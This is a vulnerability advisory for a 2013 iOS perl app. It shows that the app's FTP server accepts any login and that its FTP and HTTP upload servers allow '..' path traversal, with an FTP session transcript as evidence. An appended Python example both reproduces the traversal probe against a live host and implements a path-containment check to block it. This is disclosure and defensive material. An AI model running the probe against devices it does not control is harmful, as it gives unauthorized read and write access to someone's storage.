TITLE: Unauthenticated Remote File Upload via HTTP for perl-Programming language 1.6 on iOS

Date: 8/1/2013

Author: Larry W. Cashdollar, @_larry0

Download:

  1. https://itunes.apple.com/us/app/perl-programming-language/id578116006?mt=8&ls=1
  2. http://www.tayutec.com/indexen.html

Description: "This is an iOS perl app, you can learn, run, share perl script. Features:
Autocomplete.
Auto Indent.
Code color.
In the built-in browser or the txt editor, select the text to run.
Horizontal screen development.

Code templates, the contents of the new file is copied from contents of the template file."

Vulnerabilities: 'iOSftp' and HTTP unauthenticated file uploads. The application is sandboxed, but any remote user can read from and write to the device's storage without valid credentials: the FTP server on port 10000 logs in any username/password pair, and both the FTP and HTTP servers follow '..' in a supplied path to directories outside their upload directory.
The uploaded content is served out of the HTTP server's directory. The HTTP server doesn't process server-side scripts, but it is still possible to upload and serve malicious / illegal content from the device. I would think it's also possible to fill up the device's storage as well, but I did not test it.

larry$ ftp 192.168.0.31  10000
Connected to 192.168.0.31.
220 iosFtp server ready.
Name (192.168.0.31:larry): anyone
331 Password required for anyone
Password: 
230 User anyone logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
Remote directory: /private/var/mobile/Applications/311BCF0D-B9D8-4DC0-BE4C-2EC0887EE2CE/Documents/ftp *
ftp> cd ../../../../
250 CWD command successful.
ftp> pwd
Remote directory: /private/var/mobile
ftp> cd /
250 CWD command successful.
ftp> pwd
Remote directory: /
ftp> 
* The PWD response also discloses the application's sandbox path (path disclosure).

The HTTP server listening on port 8080 allows arbitrary file writes to storage.
You can create directories outside the upload path through the file-upload web interface by supplying '..' components in the path (the same traversal as in the FTP session above).
Because the application is sandboxed, I was unable to overwrite application executables and components, so impact is limited. As stated above, you can serve malicious content (JavaScript/HTML) via HTTP.
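The following is an added example, not part of the original advisory or the vendor's code. It does two things: probe_ftp() reproduces the FTP session above with ftplib (log in with arbitrary credentials, CWD ../../../../, compare PWD before and after), and contained() is the server-side check that would have blocked the '..' traversal in both the FTP and HTTP upload handlers: resolve the requested path against the upload root and refuse anything that lands outside it. The host, port, credentials and the choice of ftplib are assumptions; the upload-root path is copied from the transcript's PWD output.

```python
"""Added example (not the advisory's or vendor's code): an FTP traversal probe
and the path-containment check that would stop it."""
import ftplib
import posixpath

# Directory the advisory's first PWD reported (copied from the transcript).
UPLOAD_ROOT = ("/private/var/mobile/Applications/"
               "311BCF0D-B9D8-4DC0-BE4C-2EC0887EE2CE/Documents/ftp")


def contained(root, requested):
    """Return the canonical absolute target for `requested`, or None if it
    escapes `root`.  Relative paths are resolved against root; absolute
    paths must already lie under root.  normpath collapses '..' so the
    comparison is made on the real target, not the raw client string."""
    root = posixpath.normpath(root)
    if posixpath.isabs(requested):
        target = posixpath.normpath(requested)
    else:
        target = posixpath.normpath(posixpath.join(root, requested))
    if target == root or target.startswith(root + "/"):
        return target
    return None  # traversal outside the upload root: reject


def probe_ftp(host, port=10000, user="anyone", password="x", timeout=5):
    """Reproduce the advisory's session against a live target (assumed
    host/port/credentials).  Returns (pwd_before, pwd_after, escaped).
    Needs network access; not exercised offline."""
    ftp = ftplib.FTP()
    ftp.connect(host, port, timeout=timeout)
    ftp.login(user, password)          # any credentials accepted per advisory
    before = ftp.pwd()
    ftp.cwd("../../../../")            # same traversal as the transcript
    after = ftp.pwd()
    ftp.quit()
    return before, after, contained(before, after) is None


if __name__ == "__main__":
    # Offline demonstration with the paths from the transcript.
    print(contained(UPLOAD_ROOT, "index.html"))     # stays inside: allowed
    print(contained(UPLOAD_ROOT, "../../../../"))   # lands in /private/var/mobile: None
    print(contained(UPLOAD_ROOT, "/"))              # absolute escape: None
```

Four '..' components from the seven-deep upload root resolve to /private/var/mobile, exactly what the transcript's second PWD shows, so the check rejects that request while still allowing names and subdirectories under the root.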

Vendor: Notified 8/1/2013, https://twitter.com/tayutec

Advisory: http://vapid.dhs.org/advisories/perl-ios-Huang-XiaoWen.html